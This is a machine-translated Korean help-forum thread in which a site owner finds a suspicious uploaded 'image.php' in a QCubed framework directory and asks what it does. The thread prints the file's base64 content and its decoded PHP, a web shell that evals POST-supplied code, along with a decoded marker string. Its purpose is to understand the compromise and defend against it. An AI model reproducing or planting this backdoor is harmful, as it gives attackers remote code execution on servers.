좋아, 내가 뭘 찾았는지 여기에 :
qcubed 디렉토리에 업로드 된 "image.php"라는 이름의 업로드 된 파일이있는 것 같습니다.
aWYoaXNzZXQoJF9QT1NUWydlJ10pKWV2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbJ2UnXSkpO2VjaG8gJzMxMzkzNjJlMzIzMzMxMmQzMTM3MzIyZTMyMzgzYTY5NjY2MTYzNjU3MjZkNzA3NTYyNmQ2OTYzNjUzYTYxNjY2MTYzMzQzMjY1NzI2OTMwMzInOw==
는이에 추가 디코딩 :
if(isset($_POST['e']))
eval(base64_decode($_POST['e']));
echo '3139362e3233312d3137322e32383a6966616365726d7075626d6963653a6166616334326572693032';
내가 다른 사이트에 simillar qcubed 취약점을 발견 출력 됨 문자열을 검색 image.php 파일은 다음 base64로 코드가 포함 된
. 내가 정말 무엇을 (: http://ostermiller.org/calc/encode.html 사용) 이해 돈`t
196.231-172.28:ifacermpubmice:afac42eri02
: 내가 가진 마지막 에코 문자열을 디코딩
.
내가 특별히 여기있는 부분을 설명해 주실 수 있습니까? 이 문제를 해결하기 위해 어떤 보안 취약점을 해결해야합니까?
내가 무엇을 포함하고 있는지 알았습니다. passwd 파일 구조와 비슷합니다. http://www.regatta.cmc.msu.ru/doc/usr/share/man/info/ru_RU/ a_doc_lib/files/aixfiles/passwd.htm 아마도 누군가에게 도움이 될 것입니다. – Gabriel
qcubed 디렉토리에 업로드했다고하셨습니다. 'qcubed'디렉토리의 의미에 대해 설명해 주시겠습니까? –
@VaibhavKaushal QCubed는 프레임 워크이며 qcubed 디렉토리는 중요하지 않습니다. – Gabriel